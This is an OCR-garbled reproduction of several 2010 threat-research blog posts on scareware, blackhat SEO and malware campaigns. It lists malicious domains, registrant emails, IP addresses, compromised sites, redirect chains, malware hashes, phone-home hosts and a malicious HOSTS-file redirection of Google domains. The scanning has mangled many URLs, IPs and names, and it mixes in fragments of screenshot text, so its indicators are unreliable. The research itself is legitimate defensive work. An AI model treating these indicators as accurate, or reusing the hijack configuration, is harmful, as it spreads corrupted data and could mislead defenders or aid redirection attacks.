qcumoyh.co.cc - Email: bethiah.mcglasky5891@yahoo.com 
qyczejdlita.co.cc - Email: abegail.woitkoski3075@yahoo.com 
ridcamybv.co.cc - Email: laurentius.diamandoglou5401@yahoo.com 
rithubmolnda.co.cc - Email: adalynn.aiololo3070@yahoo.com 
riyvroiqfoydcilifo.co.cc - Email: irjghmpq7w9t0ah6rz@gmail.com 
rnoqzydjuia.co.cc - Email: ieuan.calcutt9416@yahoo.com 
rpdkjuaft.co.cc - Email: worley.biernackal945@yahoo.com 
rybidlzck.co.cc - Email: ander.airwyk9339@yahoo.com 
ryliydulivuvdojo.co.cc - Email: 65657927wcdn48k3u2@gmail.com 
rywutydymoxyodygyt.co.cc - Email: e8fzpd2yzy4w8hf7t4@gmail.com 
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sdemfjotuc.co.cc - Email: annemarie.bichan3685@yahoo.com 
search-portal.co.cc - Email: akhmadarroyan@gmail.com 
siycugufryyrkoylky.co.cc - Email: vso71m4qiy5isOzcs3@gmail.com 
sounluolvuoxyqixky.co.cc - Email: ay2643zdi8kywwu444@gmail.com 
sprqucoatz.co.cc - Email: vindhya.perilean5 722@yahoo.com 
ucywmuziboytylwi.co.cc - Email: m4526/7tiipj7xk9n71@gmail.com 
unotufukujygugusto.co.cc - Email: qe2m9slabdvw02g1p3@gmail.com 
upykhogupiybuwojyz.co.cc - Email: 7ea7iulobkzmfpOgrso@gmail.com 
usbokuycryocyjykqi.co.cc - Email: 5fnuzbof36ug19ly7f@gmail.com 
vobyumfoodzygubuyv.co.cc - Email: mjkexeOd9gaqkzihlo@gmail.com 
xepepele969.co.cc - Email: bemumoro6654@gmail.com 
xodovumuycguhyujip.co.cc - Email: zeqa6hr6kltwpt6eis@gmail.com 
yfwiiwoqwipihovo.co.cc - Email: 87koy5ljr5j40e9dcm@gmail.com 
ygitysbocysokuujok.co.cc - Email: qa0gvqsa8t3dr5u3yr@gmail.com 
ykraivec.co.cc - Email: wergr@ukr.net 

ynywyvtioxiloghoin.co.cc - Email: g955emcus8z0dbfebs@gmail.com 
yourbestchose.co.cc - Email: daan900@bk.ru 
yzirukwoilokocpohi.co.cc - Email: scqnbtps908moi8rgx@gmail.com 
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The .co.cc domains portfolio responds to the following IPs, parked on them are also related 
malicious domains: 
69.163.236.70 
78.159.114.244 
82.146.50.101 
82.146.54.111 
82.146.50.156 
82.146.54.116 
82.146.54.118 
82.146.54.119 
82.146.54.122 
82.146.54.129 
82.146.50.183 
82.146.54.143 
82.146.50.184 
82.146.50.188 
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82.146.54.150 
82.146.50.193 
82.146.50.194 
82.146.50.213 
82.146.54.177 
82.146.51.237 
82.146.53.244 
82.146.54.62 
82.146.54.69 
82.146.54.84 
84.16.236.31 
84.16.236.32 
84.16.229.42 
89.149.202.106 
89.149.226.127 
899.149.201.224 
89.149.255.174 
89.149.255.20 
89.149.238.225 
89.149.255.21 
89.149.200.47 
89.149.237.83 
92.63.105.179 
92.63.105.191 
92.63.98.239 
94.76.205.176 
94.76.205.177 
94.76.205.178 
94.76.205.180 
94.76.205.182 
94.76.205.183 
94.76.205.184 


174.121.196.227 


174.120.128.62 


188.120.231.249 
205.234.222.169 


212.95.56.102 
212.95.56.104 
212.95.56.89 
212.95.56.92 
212.95.56.93 
212.95.56.95 
212.95.56.96 
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Compromised sites part of the blackhat SEO campaign: 
kleertjesenmooi.nl 
knapadvies.nl 
kruidendreef60.nl 
kruijspunt.nl 

ktf-texel.nl 

lali.nl 

laplanchette.nl 
lenzfilm.nl 

leuveld.nl 
liana-makeup.com 
lidavanvelzensportmassage.nl 
lief4kids.com 
logamklusmasternl 
lookingblueeye.nl 
luccie-007.nlI 
lucmeubelbouw.nl 
lukasart.nl 
maakkennismetkennis.nl 
magisoft.be 
magnetenspecialist.nl 
mahu-services.nl 
maismoe.nl 
makaroni.info 
malena-team.nl 
maliebaanutrecht.nl 


Once the end user clicks on a link found within Google’s index, a tiny .js checks the re- 
ferrers (compromised _site.nl/directory/randomcontent.js) and the redirection takes place. For 
instance: 

- www3.donrart58-td.co.cc/ ?uid=213 &pid=3 &ttl=21f4e73673b - 93.190.141.41 - Email: 
mailwork.abc@gmail.com 

- www2.uberguardzz6.com - 94.228.220.114 - Email: gkook@checkjemail.nl 

- wwwl.favoritav31-pd.co.cc - 188.124.5.66 - Email: mailwork.abc@gmail.com 

- www2.avcleaner44-pd.co.cc - 93.190.139.214 - Email: mailwork.abc@gmail.com 


Where do we know [6]the same campaigner (?uid=213 &pid=3 &ttl=21f4e73673b) from? 
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From [7]related campaigns. 


Parked on 93.190.141.41, donrart58-td.co.cc, AS49981 WorldStream are also: 
wwws3.justsoft11-td.co.cc 
www3.donrart56-td.co.cc 
www1.newav31-pr.co.cc 
www3.goldvox-51td.xorg.pl 
www3.goldvox-61td.xorg.pl 
www3.goldvox-53td.xorg.pl 
www3.goldvox-55td.xorg.pl 
www3.goldvox-57td.xorg.pl 
www3.goldvox-59td.xorg.pl 
www1.bestdefender-58p.xorg.pl 
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www4.miymiy3.com - 93.190.141.41 - Email: gkook@checkjemail.nl 
www3.ruboidmon-60td.com - 93.190.141.41 - Email: gkook@checkjemail.nl 


Parked on 188.124.5.66, favoritav31-pd.co.cc, AS44565 VITAL TEKNOLOJI are also: 
www2.avcleaner31-pd.co.cc 

wwwz2.avcleaner35-pd.co.cc 

www3.avprotector51-td.xorg.pl 

www3.avprotector53-td.xorg.pl 

www3.avprotector55-td.xorg.pl 

www3.avprotector57-td.xorg.pl 

www3.omgsaveit4.com - 74.118.194.76 - Email: gkook@checkjemail.n| 
useguard.com - 95.169.186.25 - Email: gkook@checkjemail.nl 
updatel.useguard.com - 95.169.186.25 - Email: gkook@checkjemail.nl 
www4.miymiy2.net - Email: gkook@checkjemail.nl 


Parked on 95.169.186.25, AS31103, KEYWEB-AS are also: 
www3.justsoft10-td.co.cc 
www4.freewarez10-td.co.cc 
www3.justsoft11-td.co.cc 
www3.justsoft12-td.co.cc 
www3.avforyou23-td.co.cc 
www4.swintermz.cz.cc 
www4.trustzone16-td.xorg.pl 
www4.trustzone17-td.xorg.pl 
www4.trustzone19-td.xorg.pl 
www3.coantys-41td.xorg.pl 
www3.vointuas-81td.xorg.pl 
www3.coantys-42td.xorg.pl 
www3.coantys-46td.xorg.pl 
www4.miymiy3.com 
useguard.com 
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System folders 


System Tasks 


PF] View system information 


ih Add or remove programs 
(> Change a settings 


(> (> 
CJ Shared Documents CJ My Documents 


Hard drive 
<@ Hard drive (C:) 
Security 


Windows Security 
Security is affected by virus 


Checking: C:\Pocuments and Settings\All Users Application Data\Prop\ist.bat 


x Your Computer is infected BD WARNING | * 


Name Type Threat level 
@ Trojan.Encoder.67 Virus Medium 4 
@ Trojan.Downtoad.37236 Virus High 
@ BackDoor.Siggen.17777 Virus High E 
@ Trojan.Win32.Buzus.ebbn Virus Critical 
@ Trojan.Goo' Virus Medium y 
-~ — - - . . oom meee © =. = = se2 . — 
Recommend: Cick “Start Protection” button to erase all threats 


Detection rate: 
- packupdate 107 213.exe - [8]TROJ FRAUD.SMAF; Mal/FakeAV-AX - Result: 28/40 (70 %) 


Phones back to: 


updatel.useguard.com - 95.169.186.25 - Email: gkook@checkjemail.nl 
update2.guardinuse.net - 78.159.108.171 - Email: gkook@checkjemail.nl 
securel.protect-zone.com - 209.212.147.241 - Email: gkook@checkjemail.nl 
secure2.protectzone.net - 91.207.192.24 - Email: gkook@checkjemail.nl 
report.goodguardz.com - 93.186.124.94 - Email: gkook@checkjemail.nl 
74.82.216.3/ncr - [9]interesting HOSTS file modification 


Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 


74.125.45.100 4-open-davinci.com 

74.125.45.100 securitysoftwarepayments.com 
74.125.45.100 privatesecuredpayments.com 
74.125.45.100 secure.privatesecuredpayments.com 
74.125.45.100 getantivirusplusnow.com 
74.125.45.100 secure-plus-payments.com 
74.125.45.100 http://www.getantivirusplusnow.com 
74.125.45.100 http://www.secure-plus-payments.com 
74.125.45.100 http://www.getavplusnow.com 
74.125.45.100 safebrowsing-cache.google.com 
74.125.45.100 urs.microsoft.com 

74.125.45.100 http://www.securesoftwarebill.com 


3485 


Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
Ol - Hosts: 
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74.125.45.100 secure.paysecuresystem.com 
74.125.45.100 paysoftbillsolution.com 


74.125.45.100 protected.maxisoftwaremart.com 


74.82.216.3 http://www.google.com 
74.82.216.3 google.com 

74.82.216.3 google.com.au 
74.82.216.3 http://www.google.com.au 
74.82.216.3 google.be 

74.82.216.3 http://www.google.be 
74.82.216.3 google.com.br 
74.82.216.3 http://www.google.com.br 
74.82.216.3 google.ca 

74.82.216.3 http://www.google.ca 
74,.82.216.3 google.ch 

74,82.216.3 http://www.google.ch 
74.82.216.3 google.de 

74.82.216.3 http://www.google.de 
74,82.216.3 google.dk 

74,82.216.3 http://www.google.dk 
74.82.216.3 google.fr 

74,82.216.3 http://www.google.fr 
74.82.216.3 google.ie 

74,82.216.3 http://www.google.ie 
74.82.216.3 google.it 

74.82.216.3 http://www.google.it 
74.82.216.3 google.co.jp 
74,82.216.3 http://www.google.co.jp 
74,82.216.3 google.nl 

74,82.216.3 http://www.google.nl 
74.82.216.3 google.no 

74,82.216.3 http://www.google.no 
74,82.216.3 google.co.nz 
74.82.216.3 http://www.google.co.nz 
74.82.216.3 google.pl 

74.82.216.3 http://www.google.pl 
74.82.216.3 google.se 

74.82.216.3 http://www.google.se 
74.82.216.3 google.co.uk 
74.82.216.3 http://www.google.co.uk 
74,82.216.3 google.co.za 
74.82.216.3 http://www.google.co.za 
74.82.216.3 http://www.google-analytics.com 
74.82.216.3 http://www.bing.com 
74.82.216.3 search.yahoo.com 
74.82.216.3 http://www.search.yahoo.com 
74.82.216.3 uk.search.yahoo.com 
74.82.216.3 ca.search.yahoo.com 
74,82.216.3 de.search.yahoo.com 
74.82.216.3 fr.search.yahoo.com 
74.82.216.3 au.search.yahoo.com 


What’s so interesting about it anyway? Exact same modification was seen in "[10]Koob- 
face Botnet’s Scareware Business Model - Part Two", in regard to the Google IP 74.125.45.100. 


Take down actions are already taking place, updated will be posted as soon as new de- 
velopments emerge. 


Related research on blackhat SEO campaigns: 

[11]The ultimate guide to scareware protection 

[12]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang 
[13]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 

[14]A Peek Inside the Managed Blackhat SEO Ecosystem 

[15]Dissecting a Swine Flu Black SEO Campaign 

[16]Massive Blackhat SEO Campaign Serving Scareware 

[17]From Ukrainian Blackhat SEO Gang With Love 

[18]From Ukrainian Blackhat SEO Gang With Love - Part Two 

[19]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Black- 
hat SEO Farms 

[20]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 

[21]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot 


This post has been reproduced from [22]Dancho Danchev’s blog. Follow him 
[23]on Twitter. 


a Ee ttp://www.virustotal.com/analisis/7a62818bb8843b7d7007 10acdfd160d7c6c8505c5b8be191061£b63d5c1903a2-1275 
. http: //ddanchev. blogspot .com/2009/08/blackhat-seo-campaign-hijacks-us.htm 
. http: //ddanchev. blogspot .com/2009/08/us- federal-forms-blackhat-seo-themed.htm 

. http: //ddanchev. blogspot . com/2009/08/dissecting- ongoing-us-federal-forms.htm 

ttp://ddanchev .blogspot.com/2009/12/koobface-friendly-riccom-1td-as29550.htm 


. http: //ddanchev.blogspot.com/2010/05/torrentreactornet-serving-crimeware .htm 


ttp://hphosts.blogspot.com/2010/03/crimeware-friendly-isps-vital-teknoloji.htm 


: ttp://www.virustotal.com/analisis/Of8bfdee644f82b7c25d74555a3e905e96c1112eb701e70cef510d1a60a7ac18-1275 
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9. http: //forum.malekal .com/rogue-security-master-rapport-hijack-t26147 .htm 


10. http://ddanchev. blogspot .com/2009/11/koobface-botnets-scareware-business.htm 


ttp://www.zdnet .com/blog/security/the-ultimate-guide-to-scareware-protection/429 


12. http://ddanchev. blogspot .com/2010/02/diverse-portfolio-of-scarewareblackhat.htm 
13. http://ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 


ttp://ddanchev. blogspot .com/2009/06/peek-inside-managed-blackhat-seo.htm 


. http://ddanchev. blogspot .com/2009/05/dissecting-swine-flu-black-seo-campaign.htm 
16. 
ttp://ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with.htm 
ttp://ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


19. http://ddanchev. blogspot .com/2009/06/from-ukraine-with-scareware-serving.htm 
20. http: //ddanchev. blogspot . com/2009/07/from-ukraine-with-bogus-twitter.htm 


ttp://ddanchev. blogspot .com/2009/06/fake-web-hosting-provider-front-end-to.htm 


22. http://ddanchev.blogspot.com/ 
23. http://twitter.com/danchodanche 
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6.6.3 Dissecting the 100,000+ Scareware Serving Fake YouTube Pages Campaign 
(2010-06-08 21:49) 


You 


MALAMANTEAU 


thenameisskitties 


151,960 


Researchers from eSoft are reporting on [1]135,000 Fake YouTube pages currently serving 
scareware, in between using multiple monetization/traffic optimization tactics for the hijacked 
traffic. 


Based on the campaign’s structure, it’s pretty clear that the [2]template-ization of mal- 
ware serving sites ([3]Part Two) is not dead. Let’s dissect the campaign, it’s structure, 
the monetization/traffic optimization tactics used, list all the domains+URLs involved, and 
establish multiple connections (in the face of AS6851, BKCNET "SIA" IZZI) to recent malware 
Campaigns - cybercriminals are often customers of the same cybercrime-friendly provider. 
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The campaign is relying on a typical mix of compromised and purely malicious sites, but is 
using not just an identical template, but identical campaign structure, which remains pretty 
static for the time being. Upon visiting one of the sites and meeting the referrer requirement 
- Google works fine - the hardcoded preload.php loads, which is always pointing to the same 
IP, using a randomly generated code, which changes over time - 91.188.60.126/?q=jzhaf - 
AS6851, BKCNET "SIA" IZZI 


inetnum: 91.188.60.0 - 91.188.60.255 
netname: ATECH-SAGADE 

descr: Sagade Ltd. 

descr: Latvia, Rezekne, Darzu 21 
descr: +371 20034981 

remarks: abuse-mailbox: piotrek89@gmail.com 
country: LV 

admin-c: TMCD111-RIPE 

tech-c: TMCD111-RIPE 

status: ASSIGNED PA 

mnt-by: AS6851-MNT 

changed: taner@bkc.Iv 20100423 
source: RIPE 


role: TMCD Admin Contacts 
address: leriku 67a, Riga, LV-1084 
org: ORG-TMDA1-RIPE 

e-mail: bkc@bkc.lv 

admin-c: AS1606-RIPE 

admin-c: TP422-RIPE 

tech-c: RF2443-RIPE 

tech-c: IR106-RIPE 

nic-hdl: TMCD111-RIPE 

changed: taner@bkc.lv 20081023 
source: RIPE 


Moreover, the second traffic optimization strategy takes place by loading two different 
subdomains from byethost4.com, where another redirection takes place, this time loading the 
bogus mybookface.net - 209.51.195.115 - Email: hostorgadmin@googlemail.com 


Sample campaign structure: 
- compromised _site.com 
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- compromised _site.com/preload.php 

- 91.188.60.126/?q=jzhaf 

- popal.byethost4.com/mlik.php?sub=2 &r=google.com 
- trash. byethost14.com/tick.php?sub=1 &r=google.com 
- cnbutterfly.com/contact.php?uid=2034 - 74.81.93.227 
- simulshop.com/contact.php?uid=2034 - 88.198.177.74 
- www3.smartbestav10.co.cc - 74.118.194.78 


System Tasks Sytems : 
[2) View system formation DPared Documents My Documents 
BS Add oF remove prog ans @ 10 Viruses found @ 2 Veuses found 
BD change 0 seteng: Nerd drtve 
Nord dive (SC) 


@ 12 Veuses found 


Detected spyware and adeare on your Computer: Flename: 
9 Fiugumytiom enphorer set 
Windows Seourty @ trojan Doentoad. 377% btereddl 
Security is affected by veus Q Packed vurtidgen? dusec.Gat 
O Wind2/Spy testa FaxSetupvlog 
@ Trojan-Downtoader.Wwin32 A ipler biwe srerieet tin a 
{ Remove afl } Carne! 
| WARNING | * 
Spryware is software, which can gather information from user's computer 
througt Internet commection and send them to ts creater, Gather 
Nome Type Threat level information can be passwords, e-mail adresses and af that data, which 
0 Piugeayden Ves Medum « 
@ TrojenDowetoad.9725 Wrus egy 
@ Packed ventitigen? vue Sedum 
O Wins? Spyies Vrus Hagh 
@ Trojen-Dorentoader. Win32 Lipter Dive Wus Critical 
Recomenend: Cick “Rat Protection” button to erase af threats eart Protector) 


Domains involved in the campaign: 
action-force.net 
anytimeopen.com 
atomizer.net 
auto.ideazzz.ru 
avmarket.com.ua 
baby-car.ru 
babystart.eu 
badlhby.com 
bestseller4you.at 
butikk.losnaspelet.no 
clubshirts.info 
companions411.biz 
egeoptik.com 
e-life.com.mxl 
eshop.mr-servis.cz 
evage.biz 
eventhorizon.biz 
fliq.de 
freestyle-shop.ch 
gameartisans.org 
gawex.com.pl 
gct.ro 
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geraeuschwelten.de 
ignitionlb.info 
imalaya.eu 

indovic.net 

irpen.biz 
jasoncorrick.co.uk 
lojavirtual.versameta.pt 
machineinterface.net 


nitmail.com 
olek.co.uk 
opco.co.ir 
Username: [S™~—SSCSCSYS 
ee le Pawword: [  —Ss—~<CS~*~“—S~™SS 
MyBookFace is a friendly social networking 
alternative to MySpace and FaceBook. 
y | ry 
. Slochbevy Geld? 9700 | 
Whot to the bast home boved hannags tthe She anaes A A 
O erere beyprontor com bemetmrvamens ie: —e = = , 
© were boypronter cose 
© working ot vow dis nha? Mi s282 
Te > = It your home was 
built before 1978 
[ Add Your Pot j [ Add Your Blog ] 
pahomefinance.net 
pcmall.ro 
prozoomhosting.net 
rcchina.com.cn 
recoverinstyle.net 


relogio-de-ponto.com.pt 
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rhodiola.com.mx 
shop.ullihome.de 
shopzone.ir 
sink-o-mania.com 
sklep.autorud.pl 
sklep1.vinylove.pl 
snews.com.tw 
soposhinvitations.com 
standrite.com 
teoflowerbulbs.ro 
triominos.ru 
webmas.ca 
wesellmac.com 
wireandthewood.com 
Iclassfilter.be 
24shopping.nl 
9mama.pl 
apwireless.ca 
bazarnet.com.mx 
bead.shop-in-hk.com 
bicigrino.info 
bridezion.de 
buenapetito.net 
calicompras.com 
candjconsulting.us 
carpcompany.nl 
casacristorey.com.mx 
cheekybrats.com.au 
chiri-junior.nl 
corporate-pc.com 
deesis.com.pl 
derise.ee 
digitalelectronicsolutions.biz 
djlstop.com 
firsaturunlerim.com 
gentian.no 
guihua.com.hk 
hydromasaze.com 
iranagrishop.com 
issanni.net 


¢ [4] Complete list of the actual URLs involved in the campaign 
; [5]Pastebin 


jasoncorrick.co.uk 
klimuszko.net 
krasevka.si 
kundalinibooks.com.au 
kuub.com 
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lanpower.se 
leathershop.be 
ludf.net 
marinestores.biz 
microdermals.com 
mingfai.info 
minitar.com.tw 
msproductions.be 
murgiaintavola.it 
mvchorus.org 
nettohoffnung.de 
paketic.com 
parisa. It 
pentruacasa.com 
promotechmexico.com.mx 
pursuitsptl.com 
quadroufo.com 
quecumbar.co.uk 
rotas. It 
sammlereck.info 
sensicacciaepesca.com 
skintwo.biz 
sklep.af.com.pl 
sklep.kafti.com 
sklep.mago.com.pl 
skleplotniczy.pl 
skriptorium.at 
smscom.nl 
spine.com.br 
szemuvegkeret.com 
teldatawarehouse.com 
tiouw.nl 
uptowntrellis.co.nz 
viasapia.com.br 
vita-bhv.nl 
widlak-market.com 
wscll2.net 

xfour.es 

yeti.com.pl 


Detection for the scareware, and the manual install binary: 

- install.exe - [6]Trojan.FakeAlert.CCS; FraudTool.Win32.SecurityTool (v) - Result: 16/40 (40 %) 

- MD5: 3562be54671a1326eeef8bcfc85bd2a0 

- packupdate107 _2034.exe -[7]Packed.Win32.Krap.an; TrojWare.Win32.Trojan.Fakealert.4193280 
- Result: 10/41 (24.4 %) - MD5: 991bba541e1872191ec5eb88c7de1f30 


Upon execution the sample phones back to: 


update2.protect-helper.com - 95.169.186.25 - Email: gkook@checkjemail.nl 
updatel.free-guard.com - 95.169.186.25 - Email: gkook@checkjemail.nl 


3493 


- install.48728.exe - [8]Trojan.FakeAV; TrojanDownloader:Win32/Renos.KX - Result: 26/41 
(63.42 %) - MD5: 15281c3f3faclccdaf43e2b26d32a887 


Upon execution the sample phones back to: 

movieartsworld.com - 216.240.146.119 - Email: elaynecroft@ymail.com 

firstnationarts.com - 66.96.219.38 (redskeltonarts.com, southard _cheryl@yahoo.com) - Email: 
harold _ward@ymail.com 

sportfishingarts.com - 66.199.229.230 (greenbeearts.com, heiserdenise@ymail.com) - Email: 
rodericknovak@rocketmail.com 

bestgreatarts.com - 64.191.44.73 (freesurrealarts.com, ghuertas@rocketmail.com) - Email: 
jeffreyespey@ymail.com 

spacevisionarts.com - 69.10.35.253 (picturegraffitoarts.com, ganthony46@rocketmail.com) - 
Email: mosleyjason@rocketmail.com 

smallspacearts.com - 64.20.35.3 (dvdvideoarts.com, ganthony46@rocketmail.com) - Email: 
mosleyjason@rocketmail.com 


Based on cross-checking across different data sets, 91.188.60.126 - AS6851, BKCNET 
"SIA" IZZI is also Known to have been used by at least 4 other members of the affiliate network. 
Naturally, their "signature" can be seen across multiple ASs as well. 


Same scareware affiliate program is seen on the following IPs, using a different set of af- 
filiate partners: 

194.8.250.154/news.php?land=20 &affid=12400 - AS43134, Donstroy Ltd; Emails: donstroi- 
tel@mail.com; godaccs@gmail.com 

194.8.250.155./news.php?land=20 &affid=12400 

194.8.250.157/news.php?land=20 &affid=42500 

194.8.250.158./news.php?land=20 &affid=42500 

91.188.60.118/news.php?land=20 &affid=50900 - AS6851, Sagade Ltd.; Emails:  pi- 
otrek89@gmail.com; 

91.188.60.124/news.php?land=20 &affid=12800 

91.188.60.126/news.php?land=20 &affid=15600 

91.188.60.146/news.php?land=20 &affid=20102 

91.188.60.147/news.php?land=20 &affid=20102 

91.188.60.147/news.php?land=20 &affid=20102 

91.213.157.165/news.php?land=20 &affid=50900 - AS13618, PE "Sattelecom"; Emails: 
tt@sattelecom.biz 

77.78.239.71/news.php?land=20 &affid=12400 - AS42560, MAXIMUS-NET-SERVICES; Emails: 
godaccs@gmail.com; bosko@globalnet.ba 

77.78.239.76/news.php?land=20 &affid=12400 

77.78.239.77/news.php?land=20 &affid=15603 


As for AS6851, BKCNET "SIA" IZZI, the same AS is also seen in the following campaigns, 
find below an excerpt from a previous post, emphasizing on the Koobface gang connection, in 
the sense that they’re both customers of the same cybecrime-friendly ISP. 


¢ [9]Spamvertised iTunes Gift Certificates and CV Themed Malware Campaigns 
¢ [10]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 


¢ [11]Dissecting the Mass DreamHost Sites Compromise 
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What’s so special about [12J]AS6851, BKCNET "SIA" IZZI anyway? It’s the Koobface gang 
connection in the face of urodinam.net, which is also hosted within AS6851, currently 
responding to 91.188.59.10. More details on urodinam.net: 


¢ [13]Koobface Botnet’s Scareware Business Model 


¢ [14]Koobface Botnet’s Scareware Business Model - Part Two 
Moreover, on the exact same IP where Koobface gang’s urodinam.net is parked, 
we also have the currently active Izabslwvn538n4i5tcjl.com - Email: michaelty- 
coon@gmail.com, serving client side exploits using the Yes Malware Exploitation kit - 
91.188.59.10 /temp/cache/PDF.php; admin panel at: lIzabslwvn538n4i5tcjl.com 
/temp/admin/index.php 
4llonline-scanner-free.com 
anivirusesscaner.com 
antivirusscanneronliness.com 
avscaners.com 
easy-ns-serverorg 
@av-scanercom 
mail.41lonline-scanner-free.com NET 91.188.32.0/19 —S_» AS6851 
mail_anivirusesscaner.com 
mail.antivirusscanneronliness.com 
mail.avscaners.com 
mail.easy-ns-server.org 
mail,eav-scanercom 
nsl.easy-ns-serverorg 


For the time being, the following domains, IPs are all active within AS6851, BKCNET "SIA" IZZI: 
1zabslwvn538n4i5tcjl.com - 91.188.59.10 - Email: michaeltycoon@gmail.com 
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hotxxxtubevideo.com - 91.188.59.74 

ruexp1.ru - Email: krahil@mail.ru 

hotxtube.in - 91.188.59.74 - Email: lordjok@gmail.com 

get-money-now.net - 91.188.59.211 - Email: noxim@maidsf.ru 
easy-ns-serverorg - 91.188.60.3 - Email: russelll985@hotmail.com 
fast-scanerr-online.org - 91.188.60.3 - Email: roberson@hotmail.com 
my-antivirusplus.org - 91.188.60.3 - Email: FranciscoPGeorge@hotmail.com 
myprotectonline.org - 91.188.60.3 - Email: FranciscoPGeorge@hotmail.com 
sys-protect-online.org - 91.188.60.3 - Email: FranciscoPGeorge@hotmail.com 
av-scaner-onlinemachine.com - 91.188.60.3 - Email: gershatvO7@gmail.com 
domen-zaibisya.com - 91.188.59.211 - Email: security2guard@gmail.com 
directupdate.info - 91.188.60.10 - Email: MichaelBCarlson@gmail.com 
91.188.59.50 

91.188.60.3 

91.188.59.112 


Name servers of notice: 
ns1.ii11l00il0.com - 91.188.59.70 
ns2.ii1100il0.com - 91.188.59.71 


freeanalsextubemovies.com 


il1L00i10.com 


mail. freeanalsextubemovies.com 


mail. tilL0oil0.com 


91.188.59.74 91.188.32.0/19 ——“S-pe aséssi 


mail. yourbestway.cn 
porntubefast.com 
www.yourbestway.cn 


yourbestway.cn 


Domains using their services: 

allforilli.com - Email: lordjok@gmail.com 
allforyouplus.net - Email: leshapopovi@gmail.com 
alltubeforfree.com - Email: lordjok@gmail.com 
allxtubevids.net - Email: lordjok@gmail.com 
downloadfreenow.in - Email: lordjok@gmail.com 
enterilllisec.in - Email: leshapopovi@gmail.com 
freeanalsextubemovies.com - Email: lordjok@gmail.com 
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freetube06.com - Email: lordjok@gmail.com 
freeviewgogo.com - Email: leshapopovi@gmail.com 
homeamateurclips.com - Email: lordjok@gmail.com 
hotfilesfordownload.com 

hotxtube.in - Email: lordjok@gmail.com 
porntube2000.com - Email: welolseeees@gmail.com 
porntubefast.com - Email: welolseeees@gmail.com 
porn-tube-video.com - Email: welolseeees@gmail.com 
skachivay.com 

visiocariill.net - Email: leshapopovi@gmail.com 
xhuilillii.com - Email: lordjok@gmail.com 
yourbestway.cn - Email: haucheng@yahoo.com 
youvideoxxx.com - Email: jonnytrade@gmail.com 


Take down actions are in place, meanwhile, consider going through the "[15]Ultimate 
Guide to Scareware Protection". 


This post has been reproduced from [16]Dancho Danchev’s blog. Follow him 
[17]on Twitter. 


_itpi//threatenter blogspot. con/2010/06/185000-fake-youtube-pages-delivering hal 
_hetp://adanchev blogspot. con/2008/07 /tenplate-ization~of-malvare- serving heal 
| http: //adanchey blogspot. con/2009/02/tenplate-ization~of-nalvare~ serving. html 
_http://short text. con/0ez98inp 514 
| http: //pastebin. con/PSLXeU 

hep: //w. virustotal con/analisis/ac3E418068¢0c64c6ic61012054702c060c59901417fbdsbed76476a6c304- 1276 


—————————— 
11993 
5 
9. http: //ddanchev.blogspot .com/2010/05/spamvertised-itunes-gift-certificates.htm 
10. 
11. 
. https: //zeustracker.abuse.ch/monitor.php?host=91.188.59.50 
13. 
14 


Au RWN HE 


ttp://www.zdnet .com/blog/security/the-ultimate-guide-to-scareware-protection/429 


16. http://ddanchev. blogspot .com/ 
17. http://twitter .com/danchodanche 
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6.6.4 Facebook Photo Album Themed Malware Campaign, Mass SQL Injection At- 
tacks Courtesy of AS42560 (2010-06-15 16:05) 


oe 


A spamvertised through Facebook personal messages, Photo Aloum themed campaign, with 
the domain IP responding to ZeuS C &Cs, combined with an indirect connection between 
this campaign and the "[1]100,000+ Scareware Serving Fake YouTube Pages Campaign", 
followed by a domain portfolio used in a currently active mass SQL injection attack serving 
CVE-2007-5659 exploits, parked within the same AS as the Facebook’s campaign itself. 


What else is missing? The details of course. 


DM spamvertised URL: online-photo-albums.org - 77.78.239.4, AS42560, BA-GLOBALNET- 
AS - Email: protect@privacy.com.ua 


Detection rate: album.exe - [2]Win32.DownloaderReno; Backdoor.Win32.Kbot.anj - Re- 
sult: 12/41 (29.27 %) 

MD5: d24aa2c364d4b86f75a09362c952a838 

SHA1: 3973c547b64d166ae807eec494c373efd53ac04c 


Creates 1.exe; 2.exe and the self-destructing 3.exe. Detection rates: 
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- Lexe - [3]Result: 0/41 (0.00 %) 
MD5: fod0a495d3409123d0e90a9a734cbbcl 
SHA1: ce527267f50b433c622e5da0db5515a4d2e4ae9c 


- 2,exe - [4]Win32.DownloaderReno; Sus/UnkPacker - Result: 10/41 (24.39 %) 
MD5: 7a4feaf8d9acf982d0cbeb437e4f7c3d 
SHA1: 39b280d0d2ec505a94415f7a9468a547fee51c66 


with 3.exe phoning back to the following domain, also responding to the original cam- 
paign’s IP 77.78.239.4 
spmfb3309.com /ab/setup.php?act=filters &id=BWKJDONWLt3pn2Vh6YIhhBe3 &ver=2 


inetnum: 77.78.239.0 - 77.78.240.255 
netname: MAXIMUS-NET-SERVICES 
